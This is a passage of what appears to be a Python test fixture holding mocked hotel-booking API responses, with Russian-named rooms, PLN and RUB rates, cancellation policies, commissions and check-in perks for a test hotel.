"club": 0,
},
"room_name": "Двухместный люкс (двуспальная кровать)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"bar_rate_price_data": None,
"book_hash": "h-fe6b5ac8-f7eb-508f-bede-5fd572fd8c90",
},
{
"daily_prices": ["343.90"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "343.90",
"show_amount": "343.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "57.32",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "343.90",
"amount_show": "343.90",
"commission_info": {
"show": {
"amount_gross": "344.00",
"amount_net": "343.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "344.00",
"amount_net": "343.90",
"amount_commission": "0.10",
},
},
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
"vat_data": {
"included": False,
"value": "0.00",
},
"perks": {
"early_checkin": [
{
"charge_price": "69.00",
"show_price": "69.00",
"commission_info": {
"show": {
"amount_gross": "69.00",
"amount_net": "69.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "69.00",
"amount_net": "69.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "69.00",
"show_price": "69.00",
"commission_info": {
"show": {
"amount_gross": "69.00",
"amount_net": "69.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "69.00",
"amount_net": "69.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "344.00",
"amount_net": "343.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "344.00",
"amount_net": "343.90",
"amount_commission": "0.10",
},
},
}
]
},
"rg_ext": {
"rg_class": 5,
"quality": 4,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный люкс Business (двуспальная кровать)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"bar_rate_price_data": None,
"book_hash": "h-34b2f31f-61e9-55a4-820d-401963dfe8be",
},
{
"daily_prices": ["344.90"],
"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "344.90",
"show_amount": "344.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "57.48",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "344.90",
"amount_show": "344.90",
"commission_info": {
"show": {
"amount_gross": "344.90",
"amount_net": "344.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "344.90",
"amount_net": "344.90",
"amount_commission": "0.00",
},
},
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
"vat_data": {
"included": True,
"value": "14.73",
},
"perks": {
"early_checkin": [
{
"charge_price": "69.00",
"show_price": "69.00",
"commission_info": {
"show": {
"amount_gross": "69.00",
"amount_net": "69.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "69.00",
"amount_net": "69.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "69.00",
"show_price": "69.00",
"commission_info": {
"show": {
"amount_gross": "69.00",
"amount_net": "69.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "69.00",
"amount_net": "69.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "344.90",
"amount_net": "344.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "344.90",
"amount_net": "344.90",
"amount_commission": "0.00",
},
},
}
]
},
"rg_ext": {
"rg_class": 4,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 0,
"family": 0,
"capacity": 0,
"club": 0,
},
"room_name": "Полулюкс",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 28,
"amenities_data": [
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "75.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"bar_rate_price_data": {
"amount": "295.58",
"currency_code": "PLN",
},
"book_hash": "h-17278bae-1b55-5312-88dd-d33752e085a0",
},
{
"daily_prices": ["399.90"],
"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "399.90",
"show_amount": "399.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "66.65",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "399.90",
"amount_show": "399.90",
"commission_info": {
"show": {
"amount_gross": "399.90",
"amount_net": "399.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "399.90",
"amount_net": "399.90",
"amount_commission": "0.00",
},
},
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
"vat_data": {
"included": True,
"value": "17.08",
},
"perks": {
"early_checkin": [
{
"charge_price": "80.00",
"show_price": "80.00",
"commission_info": {
"show": {
"amount_gross": "80.00",
"amount_net": "80.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "80.00",
"amount_net": "80.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "80.00",
"show_price": "80.00",
"commission_info": {
"show": {
"amount_gross": "80.00",
"amount_net": "80.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "80.00",
"amount_net": "80.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "399.90",
"amount_net": "399.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "399.90",
"amount_net": "399.90",
"amount_commission": "0.00",
},
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 2,
"sex": 0,
"bathroom": 2,
"bedding": 0,
"family": 0,
"capacity": 0,
"club": 0,
},
"room_name": "Номер Standard",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 9,
"amenities_data": [
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "87.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"bar_rate_price_data": {
"amount": "343.24",
"currency_code": "PLN",
},
"book_hash": "h-6d8688f5-c3c6-5081-877c-ebf5eb80439b",
},
{
"daily_prices": ["418.90"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "418.90",
"show_amount": "418.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "69.82",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "418.90",
"amount_show": "418.90",
"commission_info": {
"show": {
"amount_gross": "419.00",
"amount_net": "418.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "419.00",
"amount_net": "418.90",
"amount_commission": "0.10",
},
},
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
"vat_data": {
"included": False,
"value": "0.00",
},
"perks": {
"early_checkin": [
{
"charge_price": "84.00",
"show_price": "84.00",
"commission_info": {
"show": {
"amount_gross": "84.00",
"amount_net": "84.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "84.00",
"amount_net": "84.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "84.00",
"show_price": "84.00",
"commission_info": {
"show": {
"amount_gross": "84.00",
"amount_net": "84.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "84.00",
"amount_net": "84.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "419.00",
"amount_net": "418.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "419.00",
"amount_net": "418.90",
"amount_commission": "0.10",
},
},
}
]
},
"rg_ext": {
"rg_class": 6,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместные апартаменты (двуспальная кровать) (1 комната)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"bar_rate_price_data": None,
"book_hash": "h-6399c583-f3fb-5af6-b5ac-fc6aa9e2d07e",
},
{
"daily_prices": ["510.90"],
"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "510.90",
"show_amount": "510.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "85.15",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "510.90",
"amount_show": "510.90",
"commission_info": {
"show": {
"amount_gross": "510.90",
"amount_net": "510.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "510.90",
"amount_net": "510.90",
"amount_commission": "0.00",
},
},
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
"vat_data": {
"included": True,
"value": "21.82",
},
"perks": {
"early_checkin": [
{
"charge_price": "103.00",
"show_price": "103.00",
"commission_info": {
"show": {
"amount_gross": "103.00",
"amount_net": "103.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "103.00",
"amount_net": "103.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "103.00",
"show_price": "103.00",
"commission_info": {
"show": {
"amount_gross": "103.00",
"amount_net": "103.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "103.00",
"amount_net": "103.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "510.90",
"amount_net": "510.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "510.90",
"amount_net": "510.90",
"amount_commission": "0.00",
},
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 5,
"sex": 0,
"bathroom": 2,
"bedding": 0,
"family": 0,
"capacity": 0,
"club": 0,
},
"room_name": "Номер Superior",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 2,
"amenities_data": [
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "112.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"bar_rate_price_data": {
"amount": "438.59",
"currency_code": "PLN",
},
"book_hash": "h-d4a635ef-65f6-58c4-a7a6-557f7e77e464",
},
],
"bar_price_data": {
"hotel": {"price": "123.96", "currency": "PLN"},
"room_groups": [
{
"rg_ext": {
"rg_class": 3,
"quality": 2,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"price": "123.96",
"currency": "PLN",
},
{
"rg_ext": {
"rg_class": 3,
"quality": 5,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"price": "171.62",
"currency": "PLN",
},
{
"rg_ext": {
"rg_class": 3,
"quality": 4,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"price": "204.99",
"currency": "PLN",
},
{
"rg_ext": {
"rg_class": 4,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 0,
"family": 0,
"capacity": 0,
"club": 0,
},
"price": "295.58",
"currency": "PLN",
},
{
"rg_ext": {
"rg_class": 3,
"quality": 2,
"sex": 0,
"bathroom": 2,
"bedding": 0,
"family": 0,
"capacity": 0,
"club": 0,
},
"price": "343.24",
"currency": "PLN",
},
{
"rg_ext": {
"rg_class": 3,
"quality": 5,
"sex": 0,
"bathroom": 2,
"bedding": 0,
"family": 0,
"capacity": 0,
"club": 0,
},
"price": "438.59",
"currency": "PLN",
},
],
},
}
]
},
}
affiliate_hotel_page_response = {
"debug": {
"b2b_request": {
"checkin": "2020-08-05",
"checkout": "2020-08-06",
"currency": None,
"residency": "ru",
"timeout": None,
"language": "ru",
"guests": [{"adults": 1, "children": []}],
"id": "test_hotel",
},
"key_id": 2,
"validation_error": None,
},
"error": None,
"status": "ok",
"data": {
"hotels": [
{
"id": "test_hotel",
"rates": [
{
"daily_prices": ["2097.00"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "2097.00",
"show_amount": "2097.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "349.50",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "2097.00",
"amount_show": "2097.00",
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 2,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Standard (двуспальная кровать) (двуспальная кровать king size, тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"book_hash": "h-50a6d4ca-fe41-583d-9da3-eb243e44956e",
},
{
"daily_prices": ["2097.00"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "2097.00",
"show_amount": "2097.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "349.50",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "2097.00",
"amount_show": "2097.00",
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 2,
"sex": 0,
"bathroom": 2,
"bedding": 4,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Standard (2 отдельные кровати) (тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"non-smoking",
"private-bathroom",
"twin",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"book_hash": "h-510d3f42-f0f7-5c0e-bc0e-bd8d67c48308",
},
{
"daily_prices": ["3468.00"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "3468.00",
"show_amount": "3468.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "578.00",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "3468.00",
"amount_show": "3468.00",
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 4,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Business (двуспальная кровать) (двуспальная кровать king size, тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"book_hash": "h-3a563874-dac9-5ee9-9f36-446811e43eff",
},
{
"daily_prices": ["3468.00"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "3468.00",
"show_amount": "3468.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "578.00",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "3468.00",
"amount_show": "3468.00",
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 4,
"sex": 0,
"bathroom": 2,
"bedding": 4,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Business (2 отдельные кровати) (тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"non-smoking",
"private-bathroom",
"twin",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"book_hash": "h-4ed9053d-92e3-5895-95fd-57b3eab8c02e",
},
{
"daily_prices": ["53.23"],
"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "3709.00",
"show_amount": "3709.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "618.17",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "3709.00",
"amount_show": "3709.00",
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 5,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Superior (двуспальная кровать) (тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 312,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "43.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"book_hash": "h-ddcdbbd6-0d69-5b0c-9590-297546579ed9",
},
{
"daily_prices": ["5001.00"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "5001.00",
"show_amount": "5001.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "833.50",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "5001.00",
"amount_show": "5001.00",
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
}
]
},
"rg_ext": {
"rg_class": 4,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный полулюкс (двуспальная кровать) (двуспальная кровать king size, тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"book_hash": "h-45207eff-5ad3-5122-bff9-9c26b882b152",
},
{
"daily_prices": ["5001.00"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "5001.00",
"show_amount": "5001.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "833.50",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "5001.00",
"amount_show": "5001.00",
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
}
]
},
"rg_ext": {
"rg_class": 4,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 4,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный полулюкс (2 отдельные кровати) (тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"non-smoking",
"private-bathroom",
"twin",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"book_hash": "h-3fbe7ce0-19eb-5645-a1d4-da8121157c02",
},
{
"daily_prices": ["5808.00"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "5808.00",
"show_amount": "5808.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "968.00",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "5808.00",
"amount_show": "5808.00",
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
}
]
},
"rg_ext": {
"rg_class": 5,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный люкс (двуспальная кровать)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"book_hash": "h-eb6f8537-1b80-54d2-8a70-b8bfd8e8a9d1",
},
{
"daily_prices": ["91.68"],
"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "6388.00",
"show_amount": "6388.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "1064.67",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "6388.00",
"amount_show": "6388.00",
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
}
]
},
"rg_ext": {
"rg_class": 4,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 0,
"family": 0,
"capacity": 1,
"club": 0,
},
"room_name": "Одноместный полулюкс",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 28,
"amenities_data": [
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "75.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"book_hash": "h-2fc30847-dd5c-50c6-9930-3eda4afcef74",
},
{
"daily_prices": ["106.47"],
"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "7418.00",
"show_amount": "7418.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "1236.33",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "7418.00",
"amount_show": "7418.00",
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 2,
"sex": 0,
"bathroom": 2,
"bedding": 0,
"family": 0,
"capacity": 1,
"club": 0,
},
"room_name": "Одноместный номер Standard",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 9,
"amenities_data": [
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "87.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"book_hash": "h-686c6d0c-ad5e-50be-966b-ed2713547a67",
},
{
"daily_prices": ["7421.00"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "7421.00",
"show_amount": "7421.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "1236.83",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "7421.00",
"amount_show": "7421.00",
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
}
]
},
"rg_ext": {
"rg_class": 5,
"quality": 5,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный люкс Superior (двуспальная кровать)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"book_hash": "h-5fb299f5-8afd-5718-97cb-1e2f000352bb",
},
{
"daily_prices": ["9034.00"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "9034.00",
"show_amount": "9034.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "1505.67",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "9034.00",
"amount_show": "9034.00",
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
}
]
},
"rg_ext": {
"rg_class": 6,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
